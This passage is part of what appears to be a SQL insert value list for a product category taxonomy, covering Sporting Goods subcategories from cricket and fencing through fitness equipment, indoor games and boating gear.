(4295, 4295, 0, 'Sporting Goods > Athletics > Cricket > Cricket Balls'),
(4296, 4296, 0, 'Sporting Goods > Athletics > Cricket > Cricket Bat Accessories'),
(4297, 4297, 0, 'Sporting Goods > Athletics > Cricket > Cricket Bat Accessories > Cricket Bat Grips'),
(4298, 4298, 0, 'Sporting Goods > Athletics > Cricket > Cricket Bats'),
(4299, 4299, 0, 'Sporting Goods > Athletics > Cricket > Cricket Equipment Sets'),
(4300, 4300, 0, 'Sporting Goods > Athletics > Cricket > Cricket Protective Gear'),
(4301, 4301, 0, 'Sporting Goods > Athletics > Cricket > Cricket Protective Gear > Cricket Gloves'),
(4302, 4302, 0, 'Sporting Goods > Athletics > Cricket > Cricket Protective Gear > Cricket Helmets'),
(4303, 4303, 0, 'Sporting Goods > Athletics > Cricket > Cricket Protective Gear > Cricket Leg Guards'),
(4304, 4304, 0, 'Sporting Goods > Athletics > Cricket > Cricket Stumps'),
(4305, 4305, 0, 'Sporting Goods > Athletics > Dancing'),
(4306, 4306, 0, 'Sporting Goods > Athletics > Dancing > Ballet Barres'),
(4307, 4307, 0, 'Sporting Goods > Athletics > Fencing'),
(4308, 4308, 0, 'Sporting Goods > Athletics > Fencing > Fencing Protective Gear'),
(4309, 4309, 0, 'Sporting Goods > Athletics > Fencing > Fencing Protective Gear > Fencing Gloves & Cuffs'),
(4310, 4310, 0, 'Sporting Goods > Athletics > Fencing > Fencing Protective Gear > Fencing Jackets & LamÃ©s'),
(4311, 4311, 0, 'Sporting Goods > Athletics > Fencing > Fencing Protective Gear > Fencing Masks'),
(4312, 4312, 0, 'Sporting Goods > Athletics > Fencing > Fencing Weapons'),
(4313, 4313, 0, 'Sporting Goods > Athletics > Field Hockey & Lacrosse'),
(4314, 4314, 0, 'Sporting Goods > Athletics > Field Hockey & Lacrosse > Field Hockey & Lacrosse Protective Gear'),
(4315, 4315, 0, 'Sporting Goods > Athletics > Field Hockey & Lacrosse > Field Hockey & Lacrosse Protective Gear > Field Hockey & Lacrosse Gloves'),
(4316, 4316, 0, 'Sporting Goods > Athletics > Field Hockey & Lacrosse > Field Hockey & Lacrosse Protective Gear > Field Hockey & Lacrosse Helmets'),
(4317, 4317, 0, 'Sporting Goods > Athletics > Field Hockey & Lacrosse > Field Hockey & Lacrosse Protective Gear > Field Hockey & Lacrosse Masks & Goggles'),
(4318, 4318, 0, 'Sporting Goods > Athletics > Field Hockey & Lacrosse > Field Hockey & Lacrosse Protective Gear > Field Hockey & Lacrosse Pads'),
(4319, 4319, 0, 'Sporting Goods > Athletics > Field Hockey & Lacrosse > Field Hockey Balls'),
(4320, 4320, 0, 'Sporting Goods > Athletics > Field Hockey & Lacrosse > Field Hockey Goals'),
(4321, 4321, 0, 'Sporting Goods > Athletics > Field Hockey & Lacrosse > Field Hockey Sticks'),
(4322, 4322, 0, 'Sporting Goods > Athletics > Field Hockey & Lacrosse > Lacrosse Balls'),
(4323, 4323, 0, 'Sporting Goods > Athletics > Field Hockey & Lacrosse > Lacrosse Equipment Sets'),
(4324, 4324, 0, 'Sporting Goods > Athletics > Field Hockey & Lacrosse > Lacrosse Goals'),
(4325, 4325, 0, 'Sporting Goods > Athletics > Field Hockey & Lacrosse > Lacrosse Stick Parts'),
(4326, 4326, 0, 'Sporting Goods > Athletics > Field Hockey & Lacrosse > Lacrosse Stick Parts > Lacrosse Mesh & String'),
(4327, 4327, 0, 'Sporting Goods > Athletics > Field Hockey & Lacrosse > Lacrosse Stick Parts > Lacrosse Stick Heads'),
(4328, 4328, 0, 'Sporting Goods > Athletics > Field Hockey & Lacrosse > Lacrosse Stick Parts > Lacrosse Stick Shafts'),
(4329, 4329, 0, 'Sporting Goods > Athletics > Field Hockey & Lacrosse > Lacrosse Sticks'),
(4330, 4330, 0, 'Sporting Goods > Athletics > Field Hockey & Lacrosse > Lacrosse Training Aids'),
(4331, 4331, 0, 'Sporting Goods > Athletics > Figure Skating & Hockey'),
(4332, 4332, 0, 'Sporting Goods > Athletics > Figure Skating & Hockey > Hockey Balls & Pucks'),
(4333, 4333, 0, 'Sporting Goods > Athletics > Figure Skating & Hockey > Hockey Goals'),
(4334, 4334, 0, 'Sporting Goods > Athletics > Figure Skating & Hockey > Hockey Protective Gear'),
(4335, 4335, 0, 'Sporting Goods > Athletics > Figure Skating & Hockey > Hockey Protective Gear > Hockey Elbow Pads'),
(4336, 4336, 0, 'Sporting Goods > Athletics > Figure Skating & Hockey > Hockey Protective Gear > Hockey Gloves'),
(4337, 4337, 0, 'Sporting Goods > Athletics > Figure Skating & Hockey > Hockey Protective Gear > Hockey Goalie Equipment Sets'),
(4338, 4338, 0, 'Sporting Goods > Athletics > Figure Skating & Hockey > Hockey Protective Gear > Hockey Helmets'),
(4339, 4339, 0, 'Sporting Goods > Athletics > Figure Skating & Hockey > Hockey Protective Gear > Hockey Pants'),
(4340, 4340, 0, 'Sporting Goods > Athletics > Figure Skating & Hockey > Hockey Protective Gear > Hockey Shin Guards & Leg Pads'),
(4341, 4341, 0, 'Sporting Goods > Athletics > Figure Skating & Hockey > Hockey Protective Gear > Hockey Shoulder Pads & Chest Protectors'),
(4342, 4342, 0, 'Sporting Goods > Athletics > Figure Skating & Hockey > Hockey Protective Gear > Hockey Suspenders & Belts'),
(4343, 4343, 0, 'Sporting Goods > Athletics > Figure Skating & Hockey > Hockey Sledges'),
(4344, 4344, 0, 'Sporting Goods > Athletics > Figure Skating & Hockey > Hockey Stick Care'),
(4345, 4345, 0, 'Sporting Goods > Athletics > Figure Skating & Hockey > Hockey Stick Parts'),
(4346, 4346, 0, 'Sporting Goods > Athletics > Figure Skating & Hockey > Hockey Stick Parts > Hockey Stick Blades'),
(4347, 4347, 0, 'Sporting Goods > Athletics > Figure Skating & Hockey > Hockey Stick Parts > Hockey Stick Shafts'),
(4348, 4348, 0, 'Sporting Goods > Athletics > Figure Skating & Hockey > Hockey Sticks'),
(4349, 4349, 0, 'Sporting Goods > Athletics > Figure Skating & Hockey > Ice Skate Parts & Accessories'),
(4350, 4350, 0, 'Sporting Goods > Athletics > Figure Skating & Hockey > Ice Skate Parts & Accessories > Figure Skate Boots'),
(4351, 4351, 0, 'Sporting Goods > Athletics > Figure Skating & Hockey > Ice Skate Parts & Accessories > Ice Skate Blades'),
(4352, 4352, 0, 'Sporting Goods > Athletics > Figure Skating & Hockey > Ice Skate Parts & Accessories > Ice Skate Sharpeners'),
(4353, 4353, 0, 'Sporting Goods > Athletics > Figure Skating & Hockey > Ice Skate Parts & Accessories > Skate Blade Guards'),
(4354, 4354, 0, 'Sporting Goods > Athletics > Figure Skating & Hockey > Ice Skate Parts & Accessories > Skate Lace Tighteners'),
(4355, 4355, 0, 'Sporting Goods > Athletics > Figure Skating & Hockey > Ice Skates'),
(4356, 4356, 0, 'Sporting Goods > Athletics > Football'),
(4357, 4357, 0, 'Sporting Goods > Athletics > Football > Football Gloves'),
(4358, 4358, 0, 'Sporting Goods > Athletics > Football > Football Goal Posts'),
(4359, 4359, 0, 'Sporting Goods > Athletics > Football > Football Kicking Tees & Holders'),
(4360, 4360, 0, 'Sporting Goods > Athletics > Football > Football Protective Gear'),
(4361, 4361, 0, 'Sporting Goods > Athletics > Football > Football Protective Gear > Football Girdles'),
(4362, 4362, 0, 'Sporting Goods > Athletics > Football > Football Protective Gear > Football Helmet Accessories'),
(4363, 4363, 0, 'Sporting Goods > Athletics > Football > Football Protective Gear > Football Helmet Accessories > Football Chin Straps'),
(4364, 4364, 0, 'Sporting Goods > Athletics > Football > Football Protective Gear > Football Helmet Accessories > Football Face Masks'),
(4365, 4365, 0, 'Sporting Goods > Athletics > Football > Football Protective Gear > Football Helmet Accessories > Football Helmet Padding'),
(4366, 4366, 0, 'Sporting Goods > Athletics > Football > Football Protective Gear > Football Helmet Accessories > Football Helmet Visors'),
(4367, 4367, 0, 'Sporting Goods > Athletics > Football > Football Protective Gear > Football Helmets'),
(4368, 4368, 0, 'Sporting Goods > Athletics > Football > Football Protective Gear > Football Neck Rolls'),
(4369, 4369, 0, 'Sporting Goods > Athletics > Football > Football Protective Gear > Football Rib Protection Shirts & Vests'),
(4370, 4370, 0, 'Sporting Goods > Athletics > Football > Football Protective Gear > Football Shoulder Pads'),
(4371, 4371, 0, 'Sporting Goods > Athletics > Football > Football Training Equipment'),
(4372, 4372, 0, 'Sporting Goods > Athletics > Football > Football Training Equipment > Football Dummies & Sleds'),
(4373, 4373, 0, 'Sporting Goods > Athletics > Football > Footballs'),
(4374, 4374, 0, 'Sporting Goods > Athletics > General Purpose Athletic Equipment'),
(4375, 4375, 0, 'Sporting Goods > Athletics > General Purpose Athletic Equipment > Altitude Training Masks'),
(4376, 4376, 0, 'Sporting Goods > Athletics > General Purpose Athletic Equipment > Athletic Cups'),
(4377, 4377, 0, 'Sporting Goods > Athletics > General Purpose Athletic Equipment > Ball Carrying Bags & Carts'),
(4378, 4378, 0, 'Sporting Goods > Athletics > General Purpose Athletic Equipment > Ball Pump Accessories'),
(4379, 4379, 0, 'Sporting Goods > Athletics > General Purpose Athletic Equipment > Ball Pump Accessories > Ball Pump Needles'),
(4380, 4380, 0, 'Sporting Goods > Athletics > General Purpose Athletic Equipment > Ball Pumps'),
(4381, 4381, 0, 'Sporting Goods > Athletics > General Purpose Athletic Equipment > Exercise & Gym Mat Storage Racks & Carts'),
(4382, 4382, 0, 'Sporting Goods > Athletics > General Purpose Athletic Equipment > Grip Spray & Chalk'),
(4383, 4383, 0, 'Sporting Goods > Athletics > General Purpose Athletic Equipment > Gym Mats'),
(4384, 4384, 0, 'Sporting Goods > Athletics > General Purpose Athletic Equipment > Practice Nets & Screens'),
(4385, 4385, 0, 'Sporting Goods > Athletics > General Purpose Athletic Equipment > Speed & Agility Ladders & Hurdles'),
(4386, 4386, 0, 'Sporting Goods > Athletics > General Purpose Athletic Equipment > Sports & Agility Cones'),
(4387, 4387, 0, 'Sporting Goods > Athletics > General Purpose Athletic Equipment > Sports Megaphones'),
(4388, 4388, 0, 'Sporting Goods > Athletics > General Purpose Athletic Equipment > Sports Mouthguards'),
(4389, 4389, 0, 'Sporting Goods > Athletics > General Purpose Athletic Equipment > Stadium Seats & Cushions'),
(4390, 4390, 0, 'Sporting Goods > Athletics > Gymnastics'),
(4391, 4391, 0, 'Sporting Goods > Athletics > Gymnastics > Gymnastics Bars & Balance Beams'),
(4392, 4392, 0, 'Sporting Goods > Athletics > Gymnastics > Gymnastics Protective Gear'),
(4393, 4393, 0, 'Sporting Goods > Athletics > Gymnastics > Gymnastics Protective Gear > Gymnastics Grips'),
(4394, 4394, 0, 'Sporting Goods > Athletics > Gymnastics > Gymnastics Rings'),
(4395, 4395, 0, 'Sporting Goods > Athletics > Gymnastics > Gymnastics Springboards'),
(4396, 4396, 0, 'Sporting Goods > Athletics > Gymnastics > Pommel Horses'),
(4397, 4397, 0, 'Sporting Goods > Athletics > Gymnastics > Vaulting Horses'),
(4398, 4398, 0, 'Sporting Goods > Athletics > Racquetball & Squash'),
(4399, 4399, 0, 'Sporting Goods > Athletics > Racquetball & Squash > Racquetball & Squash Balls'),
(4400, 4400, 0, 'Sporting Goods > Athletics > Racquetball & Squash > Racquetball & Squash Eyewear'),
(4401, 4401, 0, 'Sporting Goods > Athletics > Racquetball & Squash > Racquetball & Squash Gloves'),
(4402, 4402, 0, 'Sporting Goods > Athletics > Racquetball & Squash > Racquetball Racquets'),
(4403, 4403, 0, 'Sporting Goods > Athletics > Racquetball & Squash > Squash Racquets'),
(4404, 4404, 0, 'Sporting Goods > Athletics > Rounders'),
(4405, 4405, 0, 'Sporting Goods > Athletics > Rounders > Rounders Bats'),
(4406, 4406, 0, 'Sporting Goods > Athletics > Rounders > Rounders Gloves'),
(4407, 4407, 0, 'Sporting Goods > Athletics > Rugby'),
(4408, 4408, 0, 'Sporting Goods > Athletics > Rugby > Rugby Balls'),
(4409, 4409, 0, 'Sporting Goods > Athletics > Rugby > Rugby Gloves'),
(4410, 4410, 0, 'Sporting Goods > Athletics > Rugby > Rugby Posts'),
(4411, 4411, 0, 'Sporting Goods > Athletics > Rugby > Rugby Protective Gear'),
(4412, 4412, 0, 'Sporting Goods > Athletics > Rugby > Rugby Protective Gear > Rugby Headgear'),
(4413, 4413, 0, 'Sporting Goods > Athletics > Rugby > Rugby Training Aids'),
(4414, 4414, 0, 'Sporting Goods > Athletics > Soccer'),
(4415, 4415, 0, 'Sporting Goods > Athletics > Soccer > Soccer Balls'),
(4416, 4416, 0, 'Sporting Goods > Athletics > Soccer > Soccer Corner Flags'),
(4417, 4417, 0, 'Sporting Goods > Athletics > Soccer > Soccer Gloves'),
(4418, 4418, 0, 'Sporting Goods > Athletics > Soccer > Soccer Goal Accessories'),
(4419, 4419, 0, 'Sporting Goods > Athletics > Soccer > Soccer Goals'),
(4420, 4420, 0, 'Sporting Goods > Athletics > Soccer > Soccer Protective Gear'),
(4421, 4421, 0, 'Sporting Goods > Athletics > Soccer > Soccer Protective Gear > Soccer Shin Guards'),
(4422, 4422, 0, 'Sporting Goods > Athletics > Team Handball'),
(4423, 4423, 0, 'Sporting Goods > Athletics > Team Handball > Handballs'),
(4424, 4424, 0, 'Sporting Goods > Athletics > Tennis'),
(4425, 4425, 0, 'Sporting Goods > Athletics > Tennis > Tennis Ball Hoppers & Carts'),
(4426, 4426, 0, 'Sporting Goods > Athletics > Tennis > Tennis Ball Machines'),
(4427, 4427, 0, 'Sporting Goods > Athletics > Tennis > Tennis Ball Savers'),
(4428, 4428, 0, 'Sporting Goods > Athletics > Tennis > Tennis Balls'),
(4429, 4429, 0, 'Sporting Goods > Athletics > Tennis > Tennis Nets'),
(4430, 4430, 0, 'Sporting Goods > Athletics > Tennis > Tennis Racquet Accessories'),
(4431, 4431, 0, 'Sporting Goods > Athletics > Tennis > Tennis Racquet Accessories > Racquet Vibration Dampeners'),
(4432, 4432, 0, 'Sporting Goods > Athletics > Tennis > Tennis Racquet Accessories > Tennis Racquet Bags'),
(4433, 4433, 0, 'Sporting Goods > Athletics > Tennis > Tennis Racquet Accessories > Tennis Racquet Grips & Tape'),
(4434, 4434, 0, 'Sporting Goods > Athletics > Tennis > Tennis Racquet Accessories > Tennis Racquet Grommets'),
(4435, 4435, 0, 'Sporting Goods > Athletics > Tennis > Tennis Racquet Accessories > Tennis Racquet String'),
(4436, 4436, 0, 'Sporting Goods > Athletics > Tennis > Tennis Racquets'),
(4437, 4437, 0, 'Sporting Goods > Athletics > Track & Field'),
(4438, 4438, 0, 'Sporting Goods > Athletics > Track & Field > Discus'),
(4439, 4439, 0, 'Sporting Goods > Athletics > Track & Field > High Jump Crossbars'),
(4440, 4440, 0, 'Sporting Goods > Athletics > Track & Field > High Jump Pits'),
(4441, 4441, 0, 'Sporting Goods > Athletics > Track & Field > Javelins'),
(4442, 4442, 0, 'Sporting Goods > Athletics > Track & Field > Pole Vault Pits'),
(4443, 4443, 0, 'Sporting Goods > Athletics > Track & Field > Relay Batons'),
(4444, 4444, 0, 'Sporting Goods > Athletics > Track & Field > Shot Puts'),
(4445, 4445, 0, 'Sporting Goods > Athletics > Track & Field > Starter Pistols'),
(4446, 4446, 0, 'Sporting Goods > Athletics > Track & Field > Throwing Hammers'),
(4447, 4447, 0, 'Sporting Goods > Athletics > Track & Field > Track Hurdles'),
(4448, 4448, 0, 'Sporting Goods > Athletics > Track & Field > Track Starting Blocks'),
(4449, 4449, 0, 'Sporting Goods > Athletics > Track & Field > Vaulting Poles'),
(4450, 4450, 0, 'Sporting Goods > Athletics > Volleyball'),
(4451, 4451, 0, 'Sporting Goods > Athletics > Volleyball > Volleyball Nets'),
(4452, 4452, 0, 'Sporting Goods > Athletics > Volleyball > Volleyball Protective Gear'),
(4453, 4453, 0, 'Sporting Goods > Athletics > Volleyball > Volleyball Protective Gear > Volleyball Knee Pads'),
(4454, 4454, 0, 'Sporting Goods > Athletics > Volleyball > Volleyball Training Aids'),
(4455, 4455, 0, 'Sporting Goods > Athletics > Volleyball > Volleyballs'),
(4456, 4456, 0, 'Sporting Goods > Athletics > Wallyball Equipment'),
(4457, 4457, 0, 'Sporting Goods > Athletics > Water Polo'),
(4458, 4458, 0, 'Sporting Goods > Athletics > Water Polo > Water Polo Balls'),
(4459, 4459, 0, 'Sporting Goods > Athletics > Water Polo > Water Polo Caps'),
(4460, 4460, 0, 'Sporting Goods > Athletics > Water Polo > Water Polo Goals'),
(4461, 4461, 0, 'Sporting Goods > Athletics > Wrestling'),
(4462, 4462, 0, 'Sporting Goods > Athletics > Wrestling > Wrestling Protective Gear'),
(4463, 4463, 0, 'Sporting Goods > Athletics > Wrestling > Wrestling Protective Gear > Wrestling Headgear'),
(4464, 4464, 0, 'Sporting Goods > Athletics > Wrestling > Wrestling Protective Gear > Wrestling Knee Pads'),
(4465, 4465, 0, 'Sporting Goods > Exercise & Fitness'),
(4466, 4466, 0, 'Sporting Goods > Exercise & Fitness > Ab Wheels & Rollers'),
(4467, 4467, 0, 'Sporting Goods > Exercise & Fitness > Aerobic Steps'),
(4468, 4468, 0, 'Sporting Goods > Exercise & Fitness > Balance Trainers'),
(4469, 4469, 0, 'Sporting Goods > Exercise & Fitness > Cardio'),
(4470, 4470, 0, 'Sporting Goods > Exercise & Fitness > Cardio > Cardio Machine Accessories'),
(4471, 4471, 0, 'Sporting Goods > Exercise & Fitness > Cardio > Cardio Machine Accessories > Elliptical Trainer Accessories'),
(4472, 4472, 0, 'Sporting Goods > Exercise & Fitness > Cardio > Cardio Machine Accessories > Exercise Bike Accessories'),
(4473, 4473, 0, 'Sporting Goods > Exercise & Fitness > Cardio > Cardio Machine Accessories > Rowing Machine Accessories'),
(4474, 4474, 0, 'Sporting Goods > Exercise & Fitness > Cardio > Cardio Machine Accessories > Stair Climber & Stepper Accessories'),
(4475, 4475, 0, 'Sporting Goods > Exercise & Fitness > Cardio > Cardio Machine Accessories > Treadmill Accessories'),
(4476, 4476, 0, 'Sporting Goods > Exercise & Fitness > Cardio > Cardio Machines'),
(4477, 4477, 0, 'Sporting Goods > Exercise & Fitness > Cardio > Cardio Machines > Elliptical Trainers'),
(4478, 4478, 0, 'Sporting Goods > Exercise & Fitness > Cardio > Cardio Machines > Exercise Bikes'),
(4479, 4479, 0, 'Sporting Goods > Exercise & Fitness > Cardio > Cardio Machines > Rowing Machines'),
(4480, 4480, 0, 'Sporting Goods > Exercise & Fitness > Cardio > Cardio Machines > Stair Climbers & Steppers'),
(4481, 4481, 0, 'Sporting Goods > Exercise & Fitness > Cardio > Cardio Machines > Treadmills'),
(4482, 4482, 0, 'Sporting Goods > Exercise & Fitness > Cardio > Jump Ropes'),
(4483, 4483, 0, 'Sporting Goods > Exercise & Fitness > Exercise Balls'),
(4484, 4484, 0, 'Sporting Goods > Exercise & Fitness > Exercise Bands'),
(4485, 4485, 0, 'Sporting Goods > Exercise & Fitness > Exercise Benches'),
(4486, 4486, 0, 'Sporting Goods > Exercise & Fitness > Exercise Equipment Mats'),
(4487, 4487, 0, 'Sporting Goods > Exercise & Fitness > Exercise Machine & Equipment Sets'),
(4488, 4488, 0, 'Sporting Goods > Exercise & Fitness > Exercise Wedges'),
(4489, 4489, 0, 'Sporting Goods > Exercise & Fitness > Foam Roller Accessories'),
(4490, 4490, 0, 'Sporting Goods > Exercise & Fitness > Foam Roller Accessories > Foam Roller Storage Bags'),
(4491, 4491, 0, 'Sporting Goods > Exercise & Fitness > Foam Rollers'),
(4492, 4492, 0, 'Sporting Goods > Exercise & Fitness > Hand Exercisers'),
(4493, 4493, 0, 'Sporting Goods > Exercise & Fitness > Inversion Tables & Systems'),
(4494, 4494, 0, 'Sporting Goods > Exercise & Fitness > Medicine Balls'),
(4495, 4495, 0, 'Sporting Goods > Exercise & Fitness > Power Towers'),
(4496, 4496, 0, 'Sporting Goods > Exercise & Fitness > Push Up & Pull Up Bars'),
(4497, 4497, 0, 'Sporting Goods > Exercise & Fitness > Reaction Balls'),
(4498, 4498, 0, 'Sporting Goods > Exercise & Fitness > Speed & Resistance Parachutes'),
(4499, 4499, 0, 'Sporting Goods > Exercise & Fitness > Sport Safety Lights & Reflectors'),
(4500, 4500, 0, 'Sporting Goods > Exercise & Fitness > Stopwatches'),
(4501, 4501, 0, 'Sporting Goods > Exercise & Fitness > Suspension Trainers'),
(4502, 4502, 0, 'Sporting Goods > Exercise & Fitness > Vibration Exercise Machines'),
(4503, 4503, 0, 'Sporting Goods > Exercise & Fitness > Weight Lifting'),
(4504, 4504, 0, 'Sporting Goods > Exercise & Fitness > Weight Lifting > Free Weight Accessories'),
(4505, 4505, 0, 'Sporting Goods > Exercise & Fitness > Weight Lifting > Free Weight Accessories > Free Weight Storage Racks'),
(4506, 4506, 0, 'Sporting Goods > Exercise & Fitness > Weight Lifting > Free Weight Accessories > Weight Bar Collars'),
(4507, 4507, 0, 'Sporting Goods > Exercise & Fitness > Weight Lifting > Free Weight Accessories > Weight Bars'),
(4508, 4508, 0, 'Sporting Goods > Exercise & Fitness > Weight Lifting > Free Weights'),
(4509, 4509, 0, 'Sporting Goods > Exercise & Fitness > Weight Lifting > Weight Lifting Belts'),
(4510, 4510, 0, 'Sporting Goods > Exercise & Fitness > Weight Lifting > Weight Lifting Gloves & Hand Supports'),
(4511, 4511, 0, 'Sporting Goods > Exercise & Fitness > Weight Lifting > Weight Lifting Machine & Exercise Bench Accessories'),
(4512, 4512, 0, 'Sporting Goods > Exercise & Fitness > Weight Lifting > Weight Lifting Machines & Racks'),
(4513, 4513, 0, 'Sporting Goods > Exercise & Fitness > Weighted Clothing'),
(4514, 4514, 0, 'Sporting Goods > Exercise & Fitness > Yoga & Pilates'),
(4515, 4515, 0, 'Sporting Goods > Exercise & Fitness > Yoga & Pilates > Pilates Machines'),
(4516, 4516, 0, 'Sporting Goods > Exercise & Fitness > Yoga & Pilates > Yoga & Pilates Blocks'),
(4517, 4517, 0, 'Sporting Goods > Exercise & Fitness > Yoga & Pilates > Yoga & Pilates Mats'),
(4518, 4518, 0, 'Sporting Goods > Exercise & Fitness > Yoga & Pilates > Yoga & Pilates Towels'),
(4519, 4519, 0, 'Sporting Goods > Exercise & Fitness > Yoga & Pilates > Yoga Mat Bags & Straps'),
(4520, 4520, 0, 'Sporting Goods > Indoor Games'),
(4521, 4521, 0, 'Sporting Goods > Indoor Games > Air Hockey'),
(4522, 4522, 0, 'Sporting Goods > Indoor Games > Air Hockey > Air Hockey Equipment'),
(4523, 4523, 0, 'Sporting Goods > Indoor Games > Air Hockey > Air Hockey Table Parts'),
(4524, 4524, 0, 'Sporting Goods > Indoor Games > Air Hockey > Air Hockey Tables'),
(4525, 4525, 0, 'Sporting Goods > Indoor Games > Billiards'),
(4526, 4526, 0, 'Sporting Goods > Indoor Games > Billiards > Billiard Ball Racks'),
(4527, 4527, 0, 'Sporting Goods > Indoor Games > Billiards > Billiard Balls'),
(4528, 4528, 0, 'Sporting Goods > Indoor Games > Billiards > Billiard Cue Accessories'),
(4529, 4529, 0, 'Sporting Goods > Indoor Games > Billiards > Billiard Cue Accessories > Billiard Cue Cases'),
(4530, 4530, 0, 'Sporting Goods > Indoor Games > Billiards > Billiard Cue Accessories > Billiard Cue Chalk'),
(4531, 4531, 0, 'Sporting Goods > Indoor Games > Billiards > Billiard Cue Accessories > Billiard Cue Racks'),
(4532, 4532, 0, 'Sporting Goods > Indoor Games > Billiards > Billiard Cues & Bridges'),
(4533, 4533, 0, 'Sporting Goods > Indoor Games > Billiards > Billiard Gloves'),
(4534, 4534, 0, 'Sporting Goods > Indoor Games > Billiards > Billiard Table Lights'),
(4535, 4535, 0, 'Sporting Goods > Indoor Games > Billiards > Billiard Table Parts & Accessories'),
(4536, 4536, 0, 'Sporting Goods > Indoor Games > Billiards > Billiard Table Parts & Accessories > Billiard Pockets'),
(4537, 4537, 0, 'Sporting Goods > Indoor Games > Billiards > Billiard Table Parts & Accessories > Billiard Table Brushes'),
(4538, 4538, 0, 'Sporting Goods > Indoor Games > Billiards > Billiard Table Parts & Accessories > Billiard Table Cloth'),
(4539, 4539, 0, 'Sporting Goods > Indoor Games > Billiards > Billiard Table Parts & Accessories > Billiard Table Covers'),
(4540, 4540, 0, 'Sporting Goods > Indoor Games > Billiards > Billiard Tables'),
(4541, 4541, 0, 'Sporting Goods > Indoor Games > Bowling'),
(4542, 4542, 0, 'Sporting Goods > Indoor Games > Bowling > Bowling Ball Bags'),
(4543, 4543, 0, 'Sporting Goods > Indoor Games > Bowling > Bowling Balls'),
(4544, 4544, 0, 'Sporting Goods > Indoor Games > Bowling > Bowling Gloves'),
(4545, 4545, 0, 'Sporting Goods > Indoor Games > Bowling > Bowling Pins'),
(4546, 4546, 0, 'Sporting Goods > Indoor Games > Bowling > Bowling Wrist Supports'),
(4547, 4547, 0, 'Sporting Goods > Indoor Games > Foosball'),
(4548, 4548, 0, 'Sporting Goods > Indoor Games > Foosball > Foosball Balls'),
(4549, 4549, 0, 'Sporting Goods > Indoor Games > Foosball > Foosball Table Parts & Accessories'),
(4550, 4550, 0, 'Sporting Goods > Indoor Games > Foosball > Foosball Tables'),
(4551, 4551, 0, 'Sporting Goods > Indoor Games > Multi-Game Tables'),
(4552, 4552, 0, 'Sporting Goods > Indoor Games > Ping Pong'),
(4553, 4553, 0, 'Sporting Goods > Indoor Games > Ping Pong > Ping Pong Balls'),
(4554, 4554, 0, 'Sporting Goods > Indoor Games > Ping Pong > Ping Pong Nets & Posts'),
(4555, 4555, 0, 'Sporting Goods > Indoor Games > Ping Pong > Ping Pong Paddle Accessories'),
(4556, 4556, 0, 'Sporting Goods > Indoor Games > Ping Pong > Ping Pong Paddles & Sets'),
(4557, 4557, 0, 'Sporting Goods > Indoor Games > Ping Pong > Ping Pong Robot Accessories'),
(4558, 4558, 0, 'Sporting Goods > Indoor Games > Ping Pong > Ping Pong Robots'),
(4559, 4559, 0, 'Sporting Goods > Indoor Games > Ping Pong > Ping Pong Tables'),
(4560, 4560, 0, 'Sporting Goods > Indoor Games > Table Shuffleboard'),
(4561, 4561, 0, 'Sporting Goods > Indoor Games > Table Shuffleboard > Shuffleboard Tables'),
(4562, 4562, 0, 'Sporting Goods > Indoor Games > Table Shuffleboard > Table Shuffleboard Powder'),
(4563, 4563, 0, 'Sporting Goods > Indoor Games > Table Shuffleboard > Table Shuffleboard Pucks'),
(4564, 4564, 0, 'Sporting Goods > Indoor Games > Throwing Darts'),
(4565, 4565, 0, 'Sporting Goods > Indoor Games > Throwing Darts > Dart Backboards'),
(4566, 4566, 0, 'Sporting Goods > Indoor Games > Throwing Darts > Dart Parts'),
(4567, 4567, 0, 'Sporting Goods > Indoor Games > Throwing Darts > Dart Parts > Dart Flights'),
(4568, 4568, 0, 'Sporting Goods > Indoor Games > Throwing Darts > Dart Parts > Dart Shafts'),
(4569, 4569, 0, 'Sporting Goods > Indoor Games > Throwing Darts > Dart Parts > Dart Tips'),
(4570, 4570, 0, 'Sporting Goods > Indoor Games > Throwing Darts > Dartboards'),
(4571, 4571, 0, 'Sporting Goods > Indoor Games > Throwing Darts > Darts'),
(4572, 4572, 0, 'Sporting Goods > Outdoor Recreation'),
(4573, 4573, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports'),
(4574, 4574, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Boating & Rafting'),
(4575, 4575, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Boating & Rafting > Boating Gloves'),
(4576, 4576, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Boating & Rafting > Canoe Accessories'),
(4577, 4577, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Boating & Rafting > Canoes'),
(4578, 4578, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Boating & Rafting > Kayak Accessories'),
(4579, 4579, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Boating & Rafting > Kayaks'),
(4580, 4580, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Boating & Rafting > Paddle Leashes'),
(4581, 4581, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Boating & Rafting > Paddles & Oars'),
(4582, 4582, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Boating & Rafting > Pedal Boats'),
(4583, 4583, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Boating & Rafting > Row Boats'),
(4584, 4584, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Boating & Rafting > Whitewater Rafts'),
(4585, 4585, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Boating & Water Sport Apparel'),
(4586, 4586, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Boating & Water Sport Apparel > Drysuits'),
(4587, 4587, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Boating & Water Sport Apparel > Life Jacket Accessories'),
(4588, 4588, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Boating & Water Sport Apparel > Life Jackets'),
(4589, 4589, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Boating & Water Sport Apparel > Rash Guards & Swim Shirts'),
(4590, 4590, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Boating & Water Sport Apparel > Water Sport Helmets'),
(4591, 4591, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Boating & Water Sport Apparel > Wetsuit Pieces'),
(4592, 4592, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Boating & Water Sport Apparel > Wetsuit Pieces > Wetsuit Bottoms'),
(4593, 4593, 0, 'Sporting Goods > Outdoor Recreation > Boating & Water Sports > Boating & Water Sport Apparel > Wetsuit Pieces > Wetsuit Hoods, Gloves & Boots'),
